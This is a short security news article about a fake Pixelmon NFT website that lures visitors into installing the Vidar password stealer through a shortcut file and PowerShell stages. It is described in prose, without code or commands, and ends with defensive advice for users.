1 min read

Scam Pixelmon NFT Website Hosts Password-stealing Malware

Vlad CONSTANTINESCU
Ad One product to protect all your devices, without slowing them down.
Free 90-day trial
Scam Pixelmon NFT Website Hosts Password-stealing Malware

A fraudulent website mimicking popular Pixelmon NFT lures its visitors with promises of free collectibles and tokens only to have them download and install password-stealing malware.

Pixelmon is an NFT project that has garnered a significant fanbase, counting almost 200 thousand followers on Twitter and more than 25,000 Discord members. Its popularity stems from the project's promising roadmap, which includes developing an online game in the metaverse where players can collect, train, and use Pixelmon pets to battle other players.

In this recent scam attempt, threat actors have created a copy of the original website and used it to host password-stealing malware that would drain the victims' cryptocurrency wallets. The perpetrators paid great attention to detail and replicated the website almost identically.

However, instead of providing visitors with links to a game's demo version, the faux Pixelmon website hosts malicious executables that deploy password-stealing malware on infected devices. Users would need to download a malicious archive that packs a Windows shortcut to be compromised.

Upon accessing the Windows shortcut (setup.lnk), the potential victims trigger the execution of a PowerShell script that downloads a System32.hta file from the fake Pixelmon website. As BleepingComputer reported, the System32.hta file retrieves a password-stealing malware called Vidar spotted in similar attacks in the past.

Running Vidar establishes a connection to a Telegram channel, retrieves a C2's IP address, then downloads additional configuration files and modules to steal data from compromised systems. Vidar can search for relevant files on infected devices, exfiltrate them to the threat actor's defined address, and steal passwords from apps and browsers.

This malware explicitly targets text files, crypto wallets, authentication and password files, and backups and codes. As Pixelmon is an NFT site, threat actors expect visitors to have cryptocurrency wallets installed on their systems.

To steer clear of this type of attack, users should always pay attention to the website's URL, use only official links, avoid downloading content from unknown or untrusted websites, and use dedicated solutions to scan downloaded files for suspicious content.

tags


Author



Right now

Top posts

Identifying and Dealing with Online Bullying Is Not Impossible - School Presentation Inside

Identifying and Dealing with Online Bullying Is Not Impossible - School Presentation Inside

June 28, 2022

2 min read
Let’s Celebrate World Social Media Day by Improving Your Privacy and Security Online

Let’s Celebrate World Social Media Day by Improving Your Privacy and Security Online

June 28, 2022

3 min read
Bitdefender Reveals the Top Cyber Threats Faced by Consumers in 2021

Bitdefender Reveals the Top Cyber Threats Faced by Consumers in 2021

June 22, 2022

1 min read
Scam alert: Cybercrooks use shady investment domain to scam keen investors out of money and data

Scam alert: Cybercrooks use shady investment domain to scam keen investors out of money and data

May 24, 2022

3 min read
John Oliver Shows the Dark Side of Data Brokerage on Last Week Tonight

John Oliver Shows the Dark Side of Data Brokerage on Last Week Tonight

April 15, 2022

3 min read
Bitdefender Labs Warns of Phishing Scams Targeting MetaMask Users

Bitdefender Labs Warns of Phishing Scams Targeting MetaMask Users

April 14, 2022

3 min read

FOLLOW US ON

SOCIAL MEDIA


You might also like

Retail Giant in Brazil Hit by Extortion Attack Retail Giant in Brazil Hit by Extortion Attack
Alina BÎZGĂ

June 28, 2022

2 min read
LockBit 3.0 Launches First Ransomware Bug Bounty Program, Adds New Features LockBit 3.0 Launches First Ransomware Bug Bounty Program, Adds New Features
Vlad CONSTANTINESCU

June 28, 2022

2 min read
Drunk worker loses USB stick containing details of every resident of his city Drunk worker loses USB stick containing details of every resident of his city
Graham CLULEY

June 27, 2022

3 min read